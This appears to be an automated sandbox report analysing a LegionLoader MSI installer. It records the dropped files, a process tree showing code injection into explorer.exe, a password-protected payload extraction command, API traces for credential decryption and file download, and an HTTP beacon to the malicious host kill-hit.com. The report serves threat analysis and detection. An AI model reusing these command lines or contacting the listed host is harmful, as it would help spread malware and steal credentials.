Windows Analysis Report
K064a7Rfk7.msi

Overview

General Information

Sample name: K064a7Rfk7.msi
(renamed because original name is a hash value)
Original sample name: b582b290012af285192ffdecc87a30f3964dacb82e26025c558aa0f46f2ab6fe.msi
Analysis ID: 1591347
MD5: 32af5cfab7bb87beedb521de43837347
SHA1: 2f128db2405dd0362ce55629816dc8bbe83c0478
SHA256: b582b290012af285192ffdecc87a30f3964dacb82e26025c558aa0f46f2ab6fe
Tags: kill-hit-com, LegionLoader, msi, user-johnk3r

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
One or more processes crash
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • msiexec.exe (PID: 5892 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\K064a7Rfk7.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 2680 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 5356 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6E85F61D79C141FA458D0DA7A80AAA4F MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • UnRar.exe (PID: 7020 cmdline: "C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe" x -p3809610121t -o+ "C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\iwhgjds.rar" "C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\" MD5: 98CCD44353F7BC5BAD1BC6BA9AE0CD68)
      • conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • obs-ffmpeg-mux.exe (PID: 1836 cmdline: "C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe" MD5: D3CAC4D7B35BACAE314F48C374452D71)
      • conhost.exe (PID: 3004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • explorer.exe (PID: 524 cmdline: C:\Windows\SysWOW64\explorer.exe explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • WerFault.exe (PID: 2988 cmdline: C:\Windows\system32\WerFault.exe -u -p 1836 -s 256 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • createdump.exe (PID: 6060 cmdline: "C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exe" MD5: 71F796B486C7FAF25B9B16233A7CE0CD)
      • conhost.exe (PID: 4896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs.dll ReversingLabs: Detection: 24%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.1% probability
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_00C01940 SHGetKnownFolderPath,CreateFileA,GetFileSize,ReadFile,CloseHandle,lstrlenA,lstrcpyA,Concurrency::cancel_current_task,CryptUnprotectData,LocalFree
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_00C01E80 CryptUnprotectData,LocalFree,Concurrency::cancel_current_task
Source: C:\Windows\System32\msiexec.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7C382357-94C2-4F1A-B1DD-2EBBA0F0B9A9}
Source: C:\Windows\System32\msiexec.exe File opened: z:
Source: C:\Windows\System32\msiexec.exe File opened: x:
Source: C:\Windows\System32\msiexec.exe File opened: v:
Source: C:\Windows\System32\msiexec.exe File opened: t:
Source: C:\Windows\System32\msiexec.exe File opened: r:
Source: C:\Windows\System32\msiexec.exe File opened: p:
Source: C:\Windows\System32\msiexec.exe File opened: n:
Source: C:\Windows\System32\msiexec.exe File opened: l:
Source: C:\Windows\System32\msiexec.exe File opened: j:
Source: C:\Windows\System32\msiexec.exe File opened: h:
Source: C:\Windows\System32\msiexec.exe File opened: f:
Source: C:\Windows\System32\msiexec.exe File opened: b:
Source: C:\Windows\System32\msiexec.exe File opened: y:
Source: C:\Windows\System32\msiexec.exe File opened: w:
Source: C:\Windows\System32\msiexec.exe File opened: u:
Source: C:\Windows\System32\msiexec.exe File opened: s:
Source: C:\Windows\System32\msiexec.exe File opened: q:
Source: C:\Windows\System32\msiexec.exe File opened: o:
Source: C:\Windows\System32\msiexec.exe File opened: m:
Source: C:\Windows\System32\msiexec.exe File opened: k:
Source: C:\Windows\System32\msiexec.exe File opened: i:
Source: C:\Windows\System32\msiexec.exe File opened: g:
Source: C:\Windows\System32\msiexec.exe File opened: e:
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe File opened: c:
Source: C:\Windows\System32\msiexec.exe File opened: a:
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe Code function: 5_2_00007FF7AACCCED8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe Code function: 5_2_00007FF7AACFF850 FindFirstFileExA
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe Code function: 7_2_00007FFDA378A430 TryEnterCriticalSection,TerminateThread,SetThreadpoolStackInformation,SetConsoleHistoryInfo,PrefetchVirtualMemory,GetQueuedCompletionStatusEx,SystemTimeToFileTime,GetExitCodeProcess,CreateSymbolicLinkTransactedW,FindFirstFileW,LoadModule,OpenFile,OpenThread,SetFileTime,WaitForThreadpoolWorkCallbacks,FreeLibraryAndExitThread,PowerCreateRequest,InterlockedPushListSListEx,LocalFileTimeToFileTime,FindCloseChangeNotification,CreateThreadpoolCleanupGroup,QueryFullProcessImageNameW,Wow64GetThreadSelectorEntry,IsValidNLSVersion,FreeLibraryAndExitThread,CreateEventExW,SetPriorityClass,IsValidNLSVersion,RegisterApplicationRecoveryCallback,GetFileSize,GlobalFree,GetFileMUIInfo,SetConsoleActiveScreenBuffer,LCIDToLocaleName
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe Code function: 7_2_00007FFDA3785730 SetFocus,CreateFileTransactedW,GetWindowContextHelpId,VirtualAlloc,FindNextVolumeMountPointW,OpenWaitableTimerW,FindNextStreamW,AddSIDToBoundaryDescriptor,EnterCriticalSection,DeleteSynchronizationBarrier,RemoveDirectoryTransactedW,LogicalToPhysicalPoint,OpenClipboard,SetWindowRgn,GetCommProperties,ShowCursor,GetFileBandwidthReservation,VirtualAlloc,GetProcessHeap,DeleteTimerQueueTimer,WriteTapemark,GlobalHandle,SetStdHandle,CreateTimerQueueTimer,GetProcessVersion,ReadConsoleOutputW,FindFirstFileW,GetProcessVersion,GetConsoleTitleW,HeapAlloc
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe Code function: 7_2_00007FFDA37872D0 RegisterClassW,CreateWindowExW,ShowWindow,UpdateWindow,FindFirstFileW,FindClose,GetTempPathW,GetFileAttributesW,GetDC,CreateCompatibleBitmap,CreateCompatibleDC,SelectObject,CreateSolidBrush,FillRect,DeleteObject,GetObjectW,GetDIBits,SelectObject,DeleteDC,DeleteObject,CreateDirectoryW,type_info::_name_internal_method,GetMessageW,TranslateMessage,DispatchMessageW
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe Code function: 7_2_00007FFDA38345D4 FindFirstFileExW
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_00C12159 FindFirstFileExW
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe Code function: 4x nop then push rbx (7_2_00007FFD937546C0)

Networking

Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 104.21.37.86 80
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: global traffic HTTP traffic detected:
  GET /front.php?a=yrJh28ExgsVYO0Y&id=0 HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
  Host: kill-hit.com
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_00C049A0 ExitProcess,CreateThread,URLDownloadToFileA,GetFileAttributesA,Sleep,GetTempPathA,wsprintfA,GetFileAttributesA,CreateDirectoryA,wsprintfA,lstrlenA,lstrcpyA,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateFileA,WriteFile,CloseHandle,GetLastError,GetLastError,GetFileAttributesA,MoveFileA,GetLastError,GetLastError,ShellExecuteA,GetLastError,GetLastError,DeleteFileA,GetLastError,GetLastError,wsprintfA,lstrlenA,lstrcpyA,lstrlenA,GetProcessHeap,HeapFree,WaitForSingleObject,VirtualFree
Source: global traffic DNS traffic detected: DNS query: kill-hit.com
Source: global traffic HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Tue, 14 Jan 2025 21:27:25 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: keep-alive
  cf-cache-status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1tExApGNYzAAe%2BXeFIaydJZgdXwrYVyTVXvU5%2FKFzlFeL%2B2u7M08AVPxEAw6uAx7uzWDHfCnheNt5rmUf2H4wIkK%2FhpltS0cTPPCT5mdMzKd5sSvJXluCzvdRL9CfjI%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 9020b5befc84ab2d-YYZ
  server-timing: cfL4;desc="?proto=TCP&rtt=14191&min_rtt=14191&rtt_var=7095&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=176&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
  Data Ascii: 8a<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe Code function: 5_2_00007FF7AACCC148: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle,_invalid_parameter_noinfo_noreturn
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe Code function: 5_2_00007FF7AACE2740 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,SetSuspendState,ExitWindowsEx
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\41d8ef.msi
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIE0DE.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIE18B.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIE1CA.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIE1FA.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIE249.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIE289.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIE336.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\SourceHash{7C382357-94C2-4F1A-B1DD-2EBBA0F0B9A9}
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI2A5.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\41d8f2.msi
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIE0DE.tmp
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936D72607_2_00007FFD936D7260
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DC2F07_2_00007FFD936DC2F0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DA1B07_2_00007FFD936DA1B0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DC1A07_2_00007FFD936DC1A0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD937011607_2_00007FFD93701160
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DD2107_2_00007FFD936DD210
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD937030A07_2_00007FFD937030A0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DB1507_2_00007FFD936DB150
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DB7907_2_00007FFD936DB790
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD937548407_2_00007FFD93754840
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936F68207_2_00007FFD936F6820
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DE8207_2_00007FFD936DE820
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936F87F07_2_00007FFD936F87F0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DB6A07_2_00007FFD936DB6A0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936D17307_2_00007FFD936D1730
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DD7007_2_00007FFD936DD700
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DD5C07_2_00007FFD936DD5C0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DB5C07_2_00007FFD936DB5C0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936F35807_2_00007FFD936F3580
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD937806407_2_00007FFD93780640
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD937135607_2_00007FFD93713560
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936FC6507_2_00007FFD936FC650
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936F24D07_2_00007FFD936F24D0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DE4C07_2_00007FFD936DE4C0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DB4607_2_00007FFD936DB460
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DA5207_2_00007FFD936DA520
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD937144D07_2_00007FFD937144D0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD9371CBE07_2_00007FFD9371CBE0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936D3B877_2_00007FFD936D3B87
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD93712B607_2_00007FFD93712B60
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD93732B807_2_00007FFD93732B80
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936D1C307_2_00007FFD936D1C30
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD93703C007_2_00007FFD93703C00
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936F2BF07_2_00007FFD936F2BF0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD93715B007_2_00007FFD93715B00
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DBA707_2_00007FFD936DBA70
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD93702B407_2_00007FFD93702B40
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD9377DAA07_2_00007FFD9377DAA0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936D99C07_2_00007FFD936D99C0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD937009B07_2_00007FFD937009B0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DD9B07_2_00007FFD936DD9B0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DE9A07_2_00007FFD936DE9A0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936D19907_2_00007FFD936D1990
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936F59807_2_00007FFD936F5980
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936D9A507_2_00007FFD936D9A50
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DB8D07_2_00007FFD936DB8D0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DD8D07_2_00007FFD936DD8D0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD937028B07_2_00007FFD937028B0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD937049207_2_00007FFD93704920
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DD0307_2_00007FFD936DD030
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DB0307_2_00007FFD936DB030
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936D6E707_2_00007FFD936D6E70
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936F2F207_2_00007FFD936F2F20
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DDEF07_2_00007FFD936DDEF0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD93711E107_2_00007FFD93711E10
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD93702D907_2_00007FFD93702D90
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DBE207_2_00007FFD936DBE20
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936EFDF07_2_00007FFD936EFDF0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936F4C807_2_00007FFD936F4C80
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936D9D507_2_00007FFD936D9D50
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936F2D207_2_00007FFD936F2D20
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD93712CC07_2_00007FFD93712CC0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936DCCE07_2_00007FFD936DCCE0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA378A4307_2_00007FFDA378A430
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA378A7207_2_00007FFDA378A720
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA378B8D07_2_00007FFDA378B8D0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA378C6E07_2_00007FFDA378C6E0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA37890E07_2_00007FFDA37890E0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA37857307_2_00007FFDA3785730
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA3785FA07_2_00007FFDA3785FA0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA382A8287_2_00007FFDA382A828
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA381E7CC7_2_00007FFDA381E7CC
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA378647B7_2_00007FFDA378647B
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA382E4887_2_00007FFDA382E488
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA38369FC7_2_00007FFDA38369FC
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA382E91C7_2_00007FFDA382E91C
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA378B0007_2_00007FFDA378B000
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA382EF9C7_2_00007FFDA382EF9C
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA3826DC07_2_00007FFDA3826DC0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA381ECD87_2_00007FFDA381ECD8
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA38273047_2_00007FFDA3827304
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA382330C7_2_00007FFDA382330C
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA383B2907_2_00007FFDA383B290
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA378B06A7_2_00007FFDA378B06A
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA38237147_2_00007FFDA3823714
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA38336A47_2_00007FFDA38336A4
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA38235107_2_00007FFDA3823510
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA3837BFC7_2_00007FFDA3837BFC
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA383B92C7_2_00007FFDA383B92C
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA3823D587_2_00007FFDA3823D58
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA38242647_2_00007FFDA3824264
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA38345D47_2_00007FFDA38345D4
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA3820C107_2_00007FFDA3820C10
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA382CB747_2_00007FFDA382CB74
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA3788B807_2_00007FFDA3788B80
